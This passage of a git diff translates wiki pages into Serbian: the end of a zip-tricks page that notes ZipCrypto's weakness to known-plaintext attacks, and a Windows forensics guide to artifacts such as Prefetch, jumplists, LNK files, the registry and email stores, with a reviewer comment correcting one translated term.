Furthermore, zip files encrypted with the older ZipCrypto method are vulnerable to a **plaintext attack** if an unencrypted copy of a compressed file is available. This attack leverages the known content to crack the zip's password, a vulnerability detailed in [HackThis's article](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) and further explained in [this academic paper](https://www.cs.auckland.ac.nz/~mike/zipattacks.pdf). However, zip files secured with **AES-256** encryption are immune to this plaintext attack, showcasing the importance of choosing secure encryption methods for sensitive data. +Važno je napomenuti da zip datoteke zaštićene lozinkom **ne enkriptuju imena datoteka ili veličine datoteka** unutar, što je sigurnosni propust koji RAR ili 7z datoteke ne dele, jer enkriptuju te informacije. Pored toga, zip datoteke enkriptovane starijom metodom ZipCrypto su podložne **napadu u običnom tekstu** ako je dostupna neenkriptovana kopija kompresovane datoteke. Ovaj napad koristi poznati sadržaj za probijanje zip lozinke, ranjivost detaljno opisanu u [HackThis članku](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) i dodatno objašnjenu u [ovoj akademskoj studiji](https://www.cs.auckland.ac.nz/~mike/zipattacks.pdf). Međutim, zip datoteke zaštićene **AES-256** enkripcijom su imune na ovaj napad u običnom tekstu, što pokazuje važnost izbora sigurnih metoda enkripcije za osetljive podatke. -## References +## Reference - [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/) diff --git a/src/forensics/basic-forensic-methodology/windows-forensics/README.md b/src/forensics/basic-forensic-methodology/windows-forensics/README.md index 08b2ede8c..052b4c421 100644 --- a/src/forensics/basic-forensic-methodology/windows-forensics/README.md +++ b/src/forensics/basic-forensic-methodology/windows-forensics/README.md 
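Review bot: in the zips-tricks hunk `podložne **napadu u običnom tekstu**` (and `imune na ovaj napad u običnom tekstu` later in the same paragraph) mistranslates "plaintext attack" as an attack "in plain text"; the attack the paragraph describes, and the linked HackThis article names, is the known-plaintext attack on ZipCrypto, so "napadu poznatim otvorenim tekstom (known-plaintext attack)" should be used in both places so the text still states what the attack actually requires: an unencrypted copy of one compressed file.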
@@ -1,276 +1,268 @@ -# Windows Artifacts +# Windows artefakti -## Windows Artifacts +## Windows artefakti {{#include ../../../banners/hacktricks-training.md}} -
+## Generički Windows artefakti -{% embed url="https://websec.nl/" %} +### Windows 10 obaveštenja -## Generic Windows Artifacts +U putanji `\Users\\AppData\Local\Microsoft\Windows\Notifications` možete pronaći bazu podataka `appdb.dat` (pre Windows godišnjice) ili `wpndatabase.db` (posle Windows godišnjice). -### Windows 10 Notifications +Unutar ove SQLite baze podataka, možete pronaći tabelu `Notification` sa svim obaveštenjima (u XML formatu) koja mogu sadržati zanimljive podatke. -In the path `\Users\\AppData\Local\Microsoft\Windows\Notifications` you can find the database `appdb.dat` (before Windows anniversary) or `wpndatabase.db` (after Windows Anniversary). +### Hronologija -Inside this SQLite database, you can find the `Notification` table with all the notifications (in XML format) that may contain interesting data. +Hronologija je karakteristika Windows-a koja pruža **hronološku istoriju** web stranica koje su posećene, uređivanih dokumenata i izvršenih aplikacija. -### Timeline +Baza podataka se nalazi u putanji `\Users\\AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db`. Ova baza podataka može se otvoriti sa SQLite alatom ili sa alatom [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **koji generiše 2 datoteke koje se mogu otvoriti sa alatom** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md). -Timeline is a Windows characteristic that provides **chronological history** of web pages visited, edited documents, and executed applications. +### ADS (Alternativni podaci) -The database resides in the path `\Users\\AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db`. This database can be opened with an SQLite tool or with the tool [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **which generates 2 files that can be opened with the tool** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md). 
+Preuzete datoteke mogu sadržati **ADS Zone.Identifier** koji ukazuje **kako** je **preuzeta** sa intraneta, interneta itd. Neki softver (kao što su pregledači) obično dodaju čak i **više** **informacija** kao što je **URL** sa kojeg je datoteka preuzeta. -### ADS (Alternate Data Streams) +## **Backup datoteka** -Files downloaded may contain the **ADS Zone.Identifier** indicating **how** it was **downloaded** from the intranet, internet, etc. Some software (like browsers) usually put even **more** **information** like the **URL** from where the file was downloaded. +### Korpa za otpatke -## **File Backups** +U Vista/Win7/Win8/Win10 **Korpa za otpatke** može se pronaći u fascikli **`$Recycle.bin`** u korenu diska (`C:\$Recycle.bin`).\ +Kada se datoteka obriše u ovoj fascikli, kreiraju se 2 specifične datoteke: -### Recycle Bin - -In Vista/Win7/Win8/Win10 the **Recycle Bin** can be found in the folder **`$Recycle.bin`** in the root of the drive (`C:\$Recycle.bin`).\ -When a file is deleted in this folder 2 specific files are created: - -- `$I{id}`: File information (date of when it was deleted} -- `$R{id}`: Content of the file +- `$I{id}`: Informacije o datoteci (datum kada je obrisana) +- `$R{id}`: Sadržaj datoteke ![](<../../../images/image (486).png>) -Having these files you can use the tool [**Rifiuti**](https://github.com/abelcheung/rifiuti2) to get the original address of the deleted files and the date it was deleted (use `rifiuti-vista.exe` for Vista – Win10). - +Imajući ove datoteke, možete koristiti alat [**Rifiuti**](https://github.com/abelcheung/rifiuti2) da dobijete originalnu adresu obrisanih datoteka i datum kada je obrisana (koristite `rifiuti-vista.exe` za Vista – Win10). 
``` .\rifiuti-vista.exe C:\Users\student\Desktop\Recycle ``` - ![](<../../../images/image (495) (1) (1) (1).png>) ### Volume Shadow Copies -Shadow Copy is a technology included in Microsoft Windows that can create **backup copies** or snapshots of computer files or volumes, even when they are in use. +Shadow Copy je tehnologija uključena u Microsoft Windows koja može da kreira **rezervne kopije** ili snimke računarskih datoteka ili volumena, čak i kada su u upotrebi. -These backups are usually located in the `\System Volume Information` from the root of the file system and the name is composed of **UIDs** shown in the following image: +Ove rezervne kopije se obično nalaze u `\System Volume Information` iz korena datotečnog sistema, a naziv se sastoji od **UID-ova** prikazanih na sledećoj slici: ![](<../../../images/image (520).png>) -Mounting the forensics image with the **ArsenalImageMounter**, the tool [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow_copy_view.html) can be used to inspect a shadow copy and even **extract the files** from the shadow copy backups. +Montiranjem forenzičke slike sa **ArsenalImageMounter**, alat [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow_copy_view.html) može se koristiti za inspekciju shadow copy-a i čak **izvlačenje datoteka** iz rezervnih kopija shadow copy-a. ![](<../../../images/image (521).png>) -The registry entry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` contains the files and keys **to not backup**: +Unos u registru `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` sadrži datoteke i ključeve **koje ne treba praviti rezervne kopije**: ![](<../../../images/image (522).png>) -The registry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` also contains configuration information about the `Volume Shadow Copies`. +Registar `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` takođe sadrži informacije o konfiguraciji `Volume Shadow Copies`. 
### Office AutoSaved Files -You can find the office autosaved files in: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\` +Možete pronaći automatski sačuvane datoteke u: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\` ## Shell Items -A shell item is an item that contains information about how to access another file. +Shell item je stavka koja sadrži informacije o tome kako pristupiti drugoj datoteci. ### Recent Documents (LNK) -Windows **automatically** **creates** these **shortcuts** when the user **open, uses or creates a file** in: +Windows **automatski** **kreira** ove **prečice** kada korisnik **otvori, koristi ili kreira datoteku** u: - Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\` - Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\` -When a folder is created, a link to the folder, to the parent folder, and the grandparent folder is also created. +Kada se kreira folder, takođe se kreira veza do foldera, do roditeljskog foldera i do foldera bake. -These automatically created link files **contain information about the origin** like if it's a **file** **or** a **folder**, **MAC** **times** of that file, **volume information** of where is the file stored and **folder of the target file**. This information can be useful to recover those files in case they were removed. +Ove automatski kreirane datoteke sa linkovima **sadrže informacije o poreklu** kao što su da li je to **datoteka** **ili** **folder**, **MAC** **vremena** te datoteke, **informacije o volumenu** gde je datoteka smeštena i **folder ciljne datoteke**. Ove informacije mogu biti korisne za oporavak tih datoteka u slučaju da su uklonjene. -Also, the **date created of the link** file is the first **time** the original file was **first** **used** and the **date** **modified** of the link file is the **last** **time** the origin file was used. 
+Takođe, **datum kreiranja link** datoteke je prvi **put** kada je originalna datoteka **prvi put** **korisćena**, a **datum** **modifikacije** link datoteke je **poslednji** **put** kada je izvorna datoteka korišćena. -To inspect these files you can use [**LinkParser**](http://4discovery.com/our-tools/). +Da biste inspektovali ove datoteke, možete koristiti [**LinkParser**](http://4discovery.com/our-tools/). -In this tools you will find **2 sets** of timestamps: +U ovom alatu ćete pronaći **2 skupa** vremenskih oznaka: -- **First Set:** - 1. FileModifiedDate - 2. FileAccessDate - 3. FileCreationDate -- **Second Set:** - 1. LinkModifiedDate - 2. LinkAccessDate - 3. LinkCreationDate. +- **Prvi skup:** +1. FileModifiedDate +2. FileAccessDate +3. FileCreationDate +- **Drugi skup:** +1. LinkModifiedDate +2. LinkAccessDate +3. LinkCreationDate. -The first set of timestamp references the **timestamps of the file itself**. The second set references the **timestamps of the linked file**. - -You can get the same information running the Windows CLI tool: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd) +Prvi skup vremenskih oznaka se odnosi na **vremenske oznake same datoteke**. Drugi skup se odnosi na **vremenske oznake povezane datoteke**. +Možete dobiti iste informacije pokretanjem Windows CLI alata: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd) ``` LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs ``` - -In this case, the information is going to be saved inside a CSV file. +U ovom slučaju, informacije će biti sačuvane unutar CSV datoteke. ### Jumplists -These are the recent files that are indicated per application. It's the list of **recent files used by an application** that you can access on each application. They can be created **automatically or be custom**. +Ovo su nedavne datoteke koje su označene po aplikaciji. 
To je lista **nedavnih datoteka korišćenih od strane aplikacije** kojoj možete pristupiti u svakoj aplikaciji. Mogu biti kreirane **automatski ili po meri**. -The **jumplists** created automatically are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. The jumplists are named following the format `{id}.autmaticDestinations-ms` where the initial ID is the ID of the application. +**Jumplists** kreirane automatski se čuvaju u `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. Jumplists su imenovane prema formatu `{id}.autmaticDestinations-ms` gde je početni ID ID aplikacije. -The custom jumplists are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` and they are created by the application usually because something **important** has happened with the file (maybe marked as favorite) +Prilagođeni jumplists se čuvaju u `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` i obično ih kreira aplikacija jer se nešto **važnog** dogodilo sa datotekom (možda označeno kao omiljeno). -The **created time** of any jumplist indicates the **the first time the file was accessed** and the **modified time the last time**. +**Vreme kreiranja** bilo kog jumplista označava **prvi put kada je datoteka pristupljena** i **vreme modifikacije poslednji put**. -You can inspect the jumplists using [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md). +Možete pregledati jumplists koristeći [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md). 
![](<../../../images/image (474).png>) -(_Note that the timestamps provided by JumplistExplorer are related to the jumplist file itself_) +(_Napomena da su vremenski oznake koje pruža JumplistExplorer povezane sa samom jumplist datotekom_) ### Shellbags -[**Follow this link to learn what are the shellbags.**](interesting-windows-registry-keys.md#shellbags) +[**Pratite ovaj link da saznate šta su shellbags.**](interesting-windows-registry-keys.md#shellbags) -## Use of Windows USBs +## Korišćenje Windows USB-a -It's possible to identify that a USB device was used thanks to the creation of: +Moguće je identifikovati da je USB uređaj korišćen zahvaljujući kreiranju: - Windows Recent Folder - Microsoft Office Recent Folder - Jumplists -Note that some LNK file instead of pointing to the original path, points to the WPDNSE folder: +Napomena da neka LNK datoteka umesto da pokazuje na originalni put, pokazuje na WPDNSE folder: ![](<../../../images/image (476).png>) -The files in the folder WPDNSE are a copy of the original ones, then won't survive a restart of the PC and the GUID is taken from a shellbag. +Datoteke u WPDNSE folderu su kopije originalnih, stoga neće preživeti restart PC-a i GUID se uzima iz shellbaga. ### Registry Information -[Check this page to learn](interesting-windows-registry-keys.md#usb-information) which registry keys contain interesting information about USB connected devices. +[Proverite ovu stranicu da saznate](interesting-windows-registry-keys.md#usb-information) koji registry ključevi sadrže zanimljive informacije o USB povezanim uređajima. ### setupapi -Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`). +Proverite datoteku `C:\Windows\inf\setupapi.dev.log` da dobijete vremenske oznake o tome kada je USB konekcija uspostavljena (potražite `Section start`). 
![](<../../../images/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>) ### USB Detective -[**USBDetective**](https://usbdetective.com) can be used to obtain information about the USB devices that have been connected to an image. +[**USBDetective**](https://usbdetective.com) može se koristiti za dobijanje informacija o USB uređajima koji su povezani sa slikom. ![](<../../../images/image (483).png>) ### Plug and Play Cleanup -The scheduled task known as 'Plug and Play Cleanup' is primarily designed for the removal of outdated driver versions. Contrary to its specified purpose of retaining the latest driver package version, online sources suggest it also targets drivers that have been inactive for 30 days. Consequently, drivers for removable devices not connected in the past 30 days may be subject to deletion. +Zakazana aktivnost poznata kao 'Plug and Play Cleanup' prvenstveno je dizajnirana za uklanjanje zastarelih verzija drajvera. Suprotno njenoj specificiranoj svrsi zadržavanja najnovije verzije paketa drajvera, online izvori sugerišu da takođe cilja drajvere koji su bili neaktivni 30 dana. Kao rezultat, drajveri za uklonjive uređaje koji nisu povezani u poslednjih 30 dana mogu biti podložni brisanju. -The task is located at the following path: +Zadatak se nalazi na sledećem putu: `C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`. -A screenshot depicting the task's content is provided: +Prikazana je slika koja prikazuje sadržaj zadatka: ![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png) -**Key Components and Settings of the Task:** +**Ključne komponente i podešavanja zadatka:** -- **pnpclean.dll**: This DLL is responsible for the actual cleanup process. 
-- **UseUnifiedSchedulingEngine**: Set to `TRUE`, indicating the use of the generic task scheduling engine. +- **pnpclean.dll**: Ova DLL je odgovorna za stvarni proces čišćenja. +- **UseUnifiedSchedulingEngine**: Podešeno na `TRUE`, što ukazuje na korišćenje generičkog planera zadataka. - **MaintenanceSettings**: - - **Period ('P1M')**: Directs the Task Scheduler to initiate the cleanup task monthly during regular Automatic maintenance. - - **Deadline ('P2M')**: Instructs the Task Scheduler, if the task fails for two consecutive months, to execute the task during emergency Automatic maintenance. +- **Period ('P1M')**: Usmerava Planer zadataka da pokrene zadatak čišćenja mesečno tokom redovnog automatskog održavanja. +- **Deadline ('P2M')**: Upravlja Planerom zadataka, ako zadatak ne uspe dva uzastopna meseca, da izvrši zadatak tokom hitnog automatskog održavanja. -This configuration ensures regular maintenance and cleanup of drivers, with provisions for reattempting the task in case of consecutive failures. +Ova konfiguracija osigurava redovno održavanje i čišćenje drajvera, sa odredbama za ponovni pokušaj zadatka u slučaju uzastopnih neuspeha. -**For more information check:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html) +**Za više informacija proverite:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html) ## Emails -Emails contain **2 interesting parts: The headers and the content** of the email. In the **headers** you can find information like: +Emailovi sadrže **2 zanimljiva dela: zaglavlja i sadržaj** emaila. 
U **zaglavljima** možete pronaći informacije kao što su: -- **Who** sent the emails (email address, IP, mail servers that have redirected the email) -- **When** was the email sent +- **Ko** je poslao emailove (email adresa, IP, mail serveri koji su preusmerili email) +- **Kada** je email poslat -Also, inside the `References` and `In-Reply-To` headers you can find the ID of the messages: +Takođe, unutar `References` i `In-Reply-To` zaglavlja možete pronaći ID poruka: ![](<../../../images/image (484).png>) ### Windows Mail App -This application saves emails in HTML or text. You can find the emails inside subfolders inside `\Users\\AppData\Local\Comms\Unistore\data\3\`. The emails are saved with the `.dat` extension. +Ova aplikacija čuva emailove u HTML-u ili tekstu. Možete pronaći emailove unutar podfoldera unutar `\Users\\AppData\Local\Comms\Unistore\data\3\`. Emailovi se čuvaju sa `.dat` ekstenzijom. -The **metadata** of the emails and the **contacts** can be found inside the **EDB database**: `\Users\\AppData\Local\Comms\UnistoreDB\store.vol` +**Metapodaci** emailova i **kontakti** mogu se naći unutar **EDB baze podataka**: `\Users\\AppData\Local\Comms\UnistoreDB\store.vol` -**Change the extension** of the file from `.vol` to `.edb` and you can use the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) to open it. Inside the `Message` table you can see the emails. +**Promenite ekstenziju** datoteke sa `.vol` na `.edb` i možete koristiti alat [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) da je otvorite. Unutar `Message` tabele možete videti emailove. 
### Microsoft Outlook -When Exchange servers or Outlook clients are used there are going to be some MAPI headers: +Kada se koriste Exchange serveri ili Outlook klijenti, biće prisutni neki MAPI zaglavlja: -- `Mapi-Client-Submit-Time`: Time of the system when the email was sent -- `Mapi-Conversation-Index`: Number of children messages of the thread and timestamp of each message of the thread -- `Mapi-Entry-ID`: Message identifier. -- `Mappi-Message-Flags` and `Pr_last_Verb-Executed`: Information about the MAPI client (message read? no read? responded? redirected? out of the office?) +- `Mapi-Client-Submit-Time`: Vreme sistema kada je email poslat +- `Mapi-Conversation-Index`: Broj poruka u thread-u i vremenska oznaka svake poruke u thread-u +- `Mapi-Entry-ID`: Identifikator poruke. +- `Mappi-Message-Flags` i `Pr_last_Verb-Executed`: Informacije o MAPI klijentu (poruka pročitana? nije pročitana? odgovoreno? preusmereno? van kancelarije?) -In the Microsoft Outlook client, all the sent/received messages, contacts data, and calendar data are stored in a PST file in: +U Microsoft Outlook klijentu, sve poslate/primljene poruke, podaci o kontaktima i podaci o kalendaru čuvaju se u PST datoteci u: - `%USERPROFILE%\Local Settings\Application Data\Microsoft\Outlook` (WinXP) - `%USERPROFILE%\AppData\Local\Microsoft\Outlook` -The registry path `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook` indicates the file that is being used. +Putanja registra `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook` ukazuje na datoteku koja se koristi. -You can open the PST file using the tool [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html). +Možete otvoriti PST datoteku koristeći alat [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html). 
![](<../../../images/image (485).png>) ### Microsoft Outlook OST Files -An **OST file** is generated by Microsoft Outlook when it's configured with **IMAP** or an **Exchange** server, storing similar information to a PST file. This file is synchronized with the server, retaining data for **the last 12 months** up to a **maximum size of 50GB**, and is located in the same directory as the PST file. To view an OST file, the [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html) can be utilized. +**OST datoteka** se generiše od strane Microsoft Outlook-a kada je konfigurisan sa **IMAP** ili **Exchange** serverom, čuvajući slične informacije kao PST datoteka. Ova datoteka se sinhronizuje sa serverom, zadržavajući podatke za **poslednjih 12 meseci** do **maksimalne veličine od 50GB**, i nalazi se u istom direktorijumu kao PST datoteka. Da biste pregledali OST datoteku, može se koristiti [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html). ### Retrieving Attachments -Lost attachments might be recoverable from: +Izgubljeni dodaci mogu biti dostupni iz: -- For **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook` -- For **IE11 and above**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook` +- Za **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook` +- Za **IE11 i više**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook` ### Thunderbird MBOX Files -**Thunderbird** utilizes **MBOX files** to store data, located at `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`. +**Thunderbird** koristi **MBOX datoteke** za čuvanje podataka, smeštene u `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`. ### Image Thumbnails -- **Windows XP and 8-8.1**: Accessing a folder with thumbnails generates a `thumbs.db` file storing image previews, even after deletion. -- **Windows 7/10**: `thumbs.db` is created when accessed over a network via UNC path. 
-- **Windows Vista and newer**: Thumbnail previews are centralized in `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` with files named **thumbcache_xxx.db**. [**Thumbsviewer**](https://thumbsviewer.github.io) and [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) are tools for viewing these files. +- **Windows XP i 8-8.1**: Pristup folderu sa sličicama generiše `thumbs.db` datoteku koja čuva prikaze slika, čak i nakon brisanja. +- **Windows 7/10**: `thumbs.db` se kreira kada se pristupa preko mreže putem UNC putanje. +- **Windows Vista i novije**: Prikazi sličica su centralizovani u `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` sa datotekama nazvanim **thumbcache_xxx.db**. [**Thumbsviewer**](https://thumbsviewer.github.io) i [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) su alati za pregled ovih datoteka. ### Windows Registry Information -The Windows Registry, storing extensive system and user activity data, is contained within files in: +Windows Registry, koji čuva opsežne podatke o sistemu i korisničkim aktivnostima, sadrži se unutar datoteka u: -- `%windir%\System32\Config` for various `HKEY_LOCAL_MACHINE` subkeys. -- `%UserProfile%{User}\NTUSER.DAT` for `HKEY_CURRENT_USER`. -- Windows Vista and later versions back up `HKEY_LOCAL_MACHINE` registry files in `%Windir%\System32\Config\RegBack\`. -- Additionally, program execution information is stored in `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` from Windows Vista and Windows 2008 Server onwards. +- `%windir%\System32\Config` za razne `HKEY_LOCAL_MACHINE` podključeve. +- `%UserProfile%{User}\NTUSER.DAT` za `HKEY_CURRENT_USER`. +- Windows Vista i novije verzije prave rezervne kopije `HKEY_LOCAL_MACHINE` registry datoteka u `%Windir%\System32\Config\RegBack\`. +- Pored toga, informacije o izvršenju programa se čuvaju u `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` od Windows Vista i Windows 2008 Server nadalje. 
### Tools -Some tools are useful to analyze the registry files: +Neki alati su korisni za analizu registry datoteka: -- **Registry Editor**: It's installed in Windows. It's a GUI to navigate through the Windows registry of the current session. -- [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md): It allows you to load the registry file and navigate through them with a GUI. It also contains Bookmarks highlighting keys with interesting information. -- [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Again, it has a GUI that allows to navigate through the loaded registry and also contains plugins that highlight interesting information inside the loaded registry. -- [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): Another GUI application capable of extracting the important information from the registry loaded. +- **Registry Editor**: Instaliran je u Windows-u. To je GUI za navigaciju kroz Windows registry trenutne sesije. +- [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md): Omogućava vam da učitate registry datoteku i navigirate kroz njih sa GUI-jem. Takođe sadrži oznake koje ističu ključeve sa zanimljivim informacijama. +- [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Takođe ima GUI koji omogućava navigaciju kroz učitani registry i sadrži dodatke koji ističu zanimljive informacije unutar učitanog registry-a. +- [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): Još jedna GUI aplikacija sposobna da izvuče važne informacije iz učitanog registry-a. ### Recovering Deleted Element -When a key is deleted it's marked as such, but until the space it's occupying is needed it won't be removed. Therefore, using tools like **Registry Explorer** it's possible to recover these deleted keys. +Kada je ključ obrisan, označen je kao takav, ali dok prostor koji zauzima nije potreban, neće biti uklonjen. 
Stoga, korišćenjem alata kao što je **Registry Explorer**, moguće je povratiti ove obrisane ključeve. ### Last Write Time -Each Key-Value contains a **timestamp** indicating the last time it was modified. +Svaki Key-Value sadrži **vremensku oznaku** koja označava poslednji put kada je modifikovan. ### SAM -The file/hive **SAM** contains the **users, groups and users passwords** hashes of the system. +Datoteka/hive **SAM** sadrži **korisnike, grupe i heširane lozinke korisnika** sistema. -In `SAM\Domains\Account\Users` you can obtain the username, the RID, last login, last failed logon, login counter, password policy and when the account was created. To get the **hashes** you also **need** the file/hive **SYSTEM**. +U `SAM\Domains\Account\Users` možete dobiti korisničko ime, RID, poslednju prijavu, poslednji neuspešni pokušaj prijave, brojač prijava, politiku lozinki i kada je nalog kreiran. Da biste dobili **hešove**, takođe **trebate** datoteku/hive **SYSTEM**. ### Interesting entries in the Windows Registry 
@@ -282,233 +274,224 @@ interesting-windows-registry-keys.md ### Basic Windows Processes -In [this post](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) you can learn about the common Windows processes to detect suspicious behaviours. +U [ovom postu](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) možete saznati o uobičajenim Windows procesima za otkrivanje sumnjivih ponašanja. ### Windows Recent APPs -Inside the registry `NTUSER.DAT` in the path `Software\Microsoft\Current Version\Search\RecentApps` you can subkeys with information about the **application executed**, **last time** it was executed, and **number of times** it was launched. +Unutar registra `NTUSER.DAT` na putu `Software\Microsoft\Current Version\Search\RecentApps` možete pronaći podključeve sa informacijama o **izvršenoj aplikaciji**, **poslednjem putu** kada je izvršena, i **broju puta** kada je pokrenuta. ### BAM (Background Activity Moderator) -You can open the `SYSTEM` file with a registry editor and inside the path `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` you can find the information about the **applications executed by each user** (note the `{SID}` in the path) and at **what time** they were executed (the time is inside the Data value of the registry). +Možete otvoriti datoteku `SYSTEM` sa registry editorom i unutar puta `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` možete pronaći informacije o **aplikacijama koje je izvršio svaki korisnik** (napomena na `{SID}` u putu) i **u koje vreme** su izvršene (vreme je unutar Data vrednosti registra). ### Windows Prefetch -Prefetching is a technique that allows a computer to silently **fetch the necessary resources needed to display content** that a user **might access in the near future** so resources can be accessed quicker. 
+Prefetching je tehnika koja omogućava računaru da tiho **preuzme potrebne resurse potrebne za prikazivanje sadržaja** koji korisnik **može pristupiti u bliskoj budućnosti** kako bi se resursi mogli brže pristupiti. -Windows prefetch consists of creating **caches of the executed programs** to be able to load them faster. These caches as created as `.pf` files inside the path: `C:\Windows\Prefetch`. There is a limit of 128 files in XP/VISTA/WIN7 and 1024 files in Win8/Win10. +Windows prefetch se sastoji od kreiranja **kešova izvršenih programa** kako bi ih mogli brže učitati. Ovi keševi se kreiraju kao `.pf` datoteke unutar puta: `C:\Windows\Prefetch`. Postoji limit od 128 datoteka u XP/VISTA/WIN7 i 1024 datoteka u Win8/Win10. -The file name is created as `{program_name}-{hash}.pf` (the hash is based on the path and arguments of the executable). In W10 these files are compressed. Do note that the sole presence of the file indicates that **the program was executed** at some point. +Ime datoteke se kreira kao `{program_name}-{hash}.pf` (heš se zasniva na putu i argumentima izvršne datoteke). U W10 ove datoteke su kompresovane. Imajte na umu da sama prisutnost datoteke ukazuje da je **program izvršen** u nekom trenutku. -The file `C:\Windows\Prefetch\Layout.ini` contains the **names of the folders of the files that are prefetched**. This file contains **information about the number of the executions**, **dates** of the execution and **files** **open** by the program. - -To inspect these files you can use the tool [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd): +Datoteka `C:\Windows\Prefetch\Layout.ini` sadrži **imena foldera datoteka koje su preuzete**. Ova datoteka sadrži **informacije o broju izvršenja**, **datumima** izvršenja i **datotekama** **otvorenim** od strane programa. 
+Da biste pregledali ove datoteke, možete koristiti alat [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd): ```bash .\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder" ``` - ![](<../../../images/image (487).png>) ### Superprefetch -**Superprefetch** has the same goal as prefetch, **load programs faster** by predicting what is going to be loaded next. However, it doesn't substitute the prefetch service.\ -This service will generate database files in `C:\Windows\Prefetch\Ag*.db`. +**Superprefetch** ima isti cilj kao prefetch, **brže učitavanje programa** predviđanjem šta će biti učitano sledeće. Međutim, ne zamenjuje prefetch servis.\ +Ova usluga će generisati datoteke baze podataka u `C:\Windows\Prefetch\Ag*.db`. -In these databases you can find the **name** of the **program**, **number** of **executions**, **files** **opened**, **volume** **accessed**, **complete** **path**, **timeframes** and **timestamps**. +U ovim bazama podataka možete pronaći **ime** **programa**, **broj** **izvršavanja**, **otvorene** **datoteke**, **pristup** **volumenu**, **potpunu** **putanju**, **vremenske okvire** i **vremenske oznake**. -You can access this information using the tool [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/). +Možete pristupiti ovim informacijama koristeći alat [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/). ### SRUM -**System Resource Usage Monitor** (SRUM) **monitors** the **resources** **consumed** **by a process**. It appeared in W8 and it stores the data in an ESE database located in `C:\Windows\System32\sru\SRUDB.dat`. +**Monitor 